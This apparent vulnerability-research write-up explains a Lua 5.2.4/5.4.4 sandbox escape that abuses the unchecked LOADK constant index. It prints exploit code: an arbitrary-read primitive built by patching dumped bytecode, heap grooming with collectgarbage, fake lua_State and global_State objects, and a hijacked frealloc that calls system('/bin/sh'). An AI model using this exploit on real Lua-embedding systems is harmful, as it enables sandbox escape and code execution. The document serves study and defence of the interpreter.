We started our security research on Lua by analyzing1-day vulnerabilites. Case studying previous vulnerabilites may be helpful to excavate new vulnerabilites. Specifically, we reviewed sandbox escape vulnerability in Lua v5.2, and previous CVEs related Lua.
1. Sandbox escape
The follwing is an analysis of the existing version of the sandbox escaping exploit code of 5.2.4 and applying it to 5.4.4. For modifications according to the version, see lua-5.4.4-sandbox-escape, and for the existing 5.2.4 version of the exploit code, see lua-5.2.4-sandbox-escape.
Contents
- Background
- tostring
- Bytecode
- string.gsub
- string.dump
- Root Cause
- LOADK
- CONSTANTS
- Exploit
- AAR(Arbitary Address Read)
- Fake object
- Call frealloc
- Reference
Background
tostring
If the metatable of the object that came over to the factor as one of the Lua function has __tostring
as a key value, it is called as function. When an object with data types such as function
, table
, userdata
, and thread
that exist as built-in inside Lua, the address of the object is exposed as it is as follows.
Lua 5.4.4 Copyright (C) 1994-2021 Lua.org, PUC-Rio
> tostring(print)
function: 0x564ebc5a0ab0
>
Bytecode
Lua is a register-based virtual machine. Bytecode is created and interpreted by parsing the code and executed. I’ll explain it with an example.
local function foo()
local a="a" a="b" a="c"
return (#a)
end
foo()
The foo
function used in the code above is converted to the byte code below.
example of bytecode
This converted byte code is interpreted and executed inside Lua.
string.gsub
This function is used to replace some of the strings with other strings. Briefly explaining the operation of the function, it returns a value obtained by replacing the string entered as the first argument with the remaining arguments. For more information, please refer to string.gsub.
string.dump
Returns a string expressed as a binary chunk of the function passed as an argument. In this case, the binary chunk is the bytecode. After that, you can use it by putting the returned string in the load
function. For more information, please refer to string.dump.
Root cause
LOADK
Each bytecode used in Lua occupies 4bytes. Among them, in the case of the LOADK instruction, it has iABx among the follwing instruction formats.
Also, LOADK has the follwing format.
where R(A) represents the numbering of the virtual register used in the bytecode. A register corresponding to each number exists (e.g. R(1), R(2), …) and an operation is performed using it as a variable.
In addition, in the case of Bx, it means the index of CONSTANTS, which will be explained in detail later. (Specifies the number of variables in the CONSTANTS array.)
When you see the code that actually runs the LOADK,
vmcase(OP_LOADK) {
TValue *rb = k + GETARG_Bx(i);
setobj2s(L, ra, rb);
vmbreak;
}
The part where the vulnerability occurs is that there is no verification process for the Bx just described. For this reason, if an attacker finds out the address of the CONSTANTS and the offset between the address where the desired value is located and the address of the CONSTANTS, the desired value can be loaded into the desired virtual register.
CONSTANTS
CONSTANTS is a space to store variables necessary for function operation, such as function names and strings used in lua bytecode.
static void loadConstants (LoadState *S, Proto *f) {
int i;
int n = loadInt(S);
f->k = luaM_newvectorchecked(S->L, n, TValue);
f->sizek = n;
/* skipped */
}
CONSTANTS actually used in the code is being used as variable k in the luaV_execute
function. The variable is allocated space in the above loadConstants
, and the heap chunk is finally allocated by malloc.
As mentioned above, the attacker must know the address of CONSTANTS to load the desired value. To solve this, the collectgarbage function is used to induce the attacker to allocate the desired chunk to CONSTANTS.
The details will be explained in the AAR section.
Exploit
AAR(Arbitary Address Read)
local function _objAddr(o)
return tonumber(tostring(o):match('^%a+: 0x(%x+)$'),16)
end
local function readAddr(addr)
collectgarbage()
local function foo()
local a="a" a="b" a="c"
return (#a)
end
local _k={}
local _str={}
if (tostring(_k)>tostring(_str)) then
local _t = _str
_str = _k
_k = _t
end
local _intermid={}
local _str_addr = _objAddr(_str)
local _addr = numTo64L(addr - 16)
local padding_a = string.rep('\65', 8) -- 0x41 padding
local padding_b = string.rep('\20', 15) -- LUA_VLNGSTR tag padding
collectgarbage()
_str = nil
_intermid=nil
collectgarbage()
_str = padding_a .. _addr .. padding_b;
foo = string.dump(foo)
foo = foo:gsub(escapeString(createLOADK(0,2)),
escapeString(createLOADK(0, (_str_addr+0x20 - _objAddr(_k))/16 )))
_intermid = {}
collectgarbage()
_intermid = nil
_k=nil
collectgarbage()
foo = load(foo)
return foo()
end
local function objAddr(o)
local known_objects = {}
known_objects['thread'] = 1; known_objects['function']=1; known_objects['userdata']=1; known_objects['table'] = 1;
local tp = type(o)
if (known_objects[tp]) then return _objAddr(o) end
local f = function(a) coroutine.yield(a) end
local t = coroutine.create(f)
local top = readAddr(_objAddr(t) + 0x10)
coroutine.resume(t, o)
local addr = readAddr(top)
return addr
end
local function bufferAddress(b)
return (objAddr(b) + 0x18)
end
The code above is the part that does AAR. Before explaining the readAddr
function used in AAR, let’s first explain about OP_LEN
, one of the bytecode commands.
If you use #
that returns the length of an object in the lua code, OP_LEN
is used internally in the bytecode.
The format of the OP_LEN
bytecode is as above, and looking at the actual code
vmcase(OP_LEN) {
Protect(luaV_objlen(L, ra, vRB(i)));
vmbreak;
}
You can see that it calls the luaV_objlen
function internally. Looking at this
/*
** Main operation 'ra = #rb'.
*/
void luaV_objlen (lua_State *L, StkId ra, const TValue *rb) {
const TValue *tm;
switch (ttypetag(rb)) {
/* skipped */
case LUA_VSHRSTR: {
setivalue(s2v(ra), tsvalue(rb)->shrlen);
return;
}
case LUA_VLNGSTR: {
setivalue(s2v(ra), tsvalue(rb)->u.lnglen);
return;
}
/* skipped */
}
/*
** Header for a string value.
*/
typedef struct TString {
CommonHeader;
lu_byte extra; /* reserved words for short strings; "has hash" for longs */
lu_byte shrlen; /* length for short strings */
unsigned int hash;
union {
size_t lnglen; /* length for long strings */
struct TString *hnext; /* linked list for hash table */
} u;
char contents[1];
} TString;
If you look inside the luaV_objlen
function, it checks the typetag of the rb
value passed as an argument, and returns shrlen
in case of LUA_VSHRSTR
and lnglen
in case of LUA_VLNGSTR
.
Now let’s go back to the AAR code and take a look at the readAddr
function.
When the foo
function used in the first part is converted into byte code, it is converted as shown in example of bytecode
. As mentioned above, by using the vulnerability of LOADK
the desired address is substituted for the string, and then the value of the desired address is found through the OP_LEN
instruction.
The collectgarbage function is used to satisfy the two conditions mentioned in the root cause part. After assigning the declared variable to nil, executing collectgarbage(), and then declaring a variable of the same size, a chunk with the same address is allocated.
Using this point, it induces the attacker to allocate the chunk of the variable declared by the attacker to the variable k
, finds the distance between this variable and the desired address, and sets the offset using string.dump
First set the variable k
you want to assign and the location of the address you want to read.
local _k={}
local _str={}
if (tostring(_k)>tostring(_str)) then
local _t = _str
_str = _k
_k = _t
end
In this code, the _k
variable must not be located at an address higher than the position of the _str
variable on the virtual memory addres, so in this case, the two variables are replaced.
local _addr = numTo64L(addr - 16)
local padding_a = string.rep('\65', 8) -- 0x41 padding
local padding_b = string.rep('\20', 15) -- LUA_VLNGSTR tag padding
After that, it creates a string padded with a padding value of 0x41, an address subtracted by 0x10 from the address to be read (because the length variable is stored at 0x10 based on the TString
structure), and a LUA_VLNSTR
tag. After calculating the position of the generated string, the offset of the LOADK
instruction is replaced.
foo = string.dump(foo)
foo = foo:gsub(escapeString(createLOADK(0,2)),
escapeString(createLOADK(0, (_str_addr+0x20 - _objAddr(_k))/16 )))
collectgarbage()
_k=nil
collectgarbage()
foo = load(foo)
return foo()
If you execute the foo
function replaced with string.gsub
as above, AAR to find out the value assigned to the address attacker wants to read becomes possible. Implement objAddr
, a function that finds the address of an object using the readAddr
function implemented in this way.
local function objAddr(o)
local known_objects = {}
known_objects['thread'] = 1; known_objects['function']=1; known_objects['userdata']=1; known_objects['table'] = 1;
local tp = type(o)
if (known_objects[tp]) then return _objAddr(o) end
local f = function(a) coroutine.yield(a) end
local t = coroutine.create(f)
local top = readAddr(_objAddr(t) + 0x10) --The field top is in offset 0x10
coroutine.resume(t, o)
local addr = readAddr(top)
return addr
end
In the objAddr
function, if there are four data types (thread
, function
, userdata
, table
) in which the address of data is indicated by the tostring
function, it is obtained directly through _objAddr
. In other cases, the readAddr
function is executed using the top
member variable in lua_State
after putting it as an argument of the coroutine that executes coroutine.yield
. The value of the input address is read through two function executions (once the value pointed to by top
, and once AAR is performed using the value).
Fake object
Now, create fake lua_State
and fake global_State
using the AAR described above.
local f = function() coroutine.yield() local a = string.rep('asda', 20) end
local t = coroutine.create(f)
coroutine.resume(t)
local t_addr = objAddr(t)
local l_G_addr = readAddr(readAddr(t_addr) + 0x18)
l_G = memcpy(l_G_addr, 1416) -- sizeof(global_State)=1416
l_G = numTo64L(addr) .. numTo64L(arg) .. l_G:sub(17)
l_G_addr = bufferAddress(l_G)
local t_buffer = memcpy(t_addr, 200) -- sizeof(lua_State)=200
t_buffer = t_buffer:sub(1,14) .. '\01\01' .. t_buffer:sub(17,24).. numTo64L(l_G_addr) .. t_buffer:sub(33)
collectgarbage()
t_addr = bufferAddress(t_buffer) -- t_addr = &fake_luaState
After creating a coroutine
, use the thread
to get the address of global_State
and copy as much as the size of global_State
from the address to create a fake global_State
string. After that, in the same way, the thread (lua_State
) assigned to the variable t
is copied to create the fake lua_State
string. After that, the address to be executed is set to the location of frealloc
of fake global_State
, and the address of the first desired argument is set to the location of ud
. Set the address of the fake global_State
set in this way as the l_G
variable of the fake lua_State
.
Call frealloc
We finish the exploit using the fake lua_State
created in the Fake Object
table of contents
local g = function() local a="a" coroutine.resume(a) end
g = string.dump(g)
g = g:gsub(escapeString(createLOADK(0,0)),
escapeString(createLOADK(0, (t_addr-k_addr)/16)))
collectgarbage()
-- clean tcache bins
local t1 = {}
local t2 = {}
local t3 = {}
local t4 = {}
local t5 = {}
local t6 = {}
local t7 = {}
collectgarbage()
k=nil
collectgarbage()
g, err = load(g)
g()
We’ll use the same trick we used to do the AAR here after declaring the function g
. During the operation of g
using string.dump
, fake lua_State
is set as an argument of coroutine.resume(a)
instead of a string. After that, load(g)
is executed to call the string.rep
function defined in function f
. At this time, Lua internally allocates chunks for string creation. During this process, the global_State’s frealloc
function is called, and the global_State
referenced at this time is a fake global_State
created by the attacker. So, instead of calling the normal frealloc
, it calls system(“/bin/sh”) and the attacker can get the shell.
Exploit flow schematic
Reference
- lua-5.2.4-sandbox-escape
- lua-5.4.4-sandbox-escape
- lua-bytecode
- lua-5.3-Bytecode-Reference
- Programming-in-Lua
- github-lua
- string.gsub
- string.dump
2. CVEs related to Lua
There are 10 CVEs related to Lua. You can find them from this link. The most recent one(CVE-2021-43519) is what we had got with our project. We analyzed all of the CVEs(except the recent one) to understand the internal structure of Lua. If you look in detail, you can figure out that most CVEs seem to be far from a critical issue. We made analysis documents for each CVEs.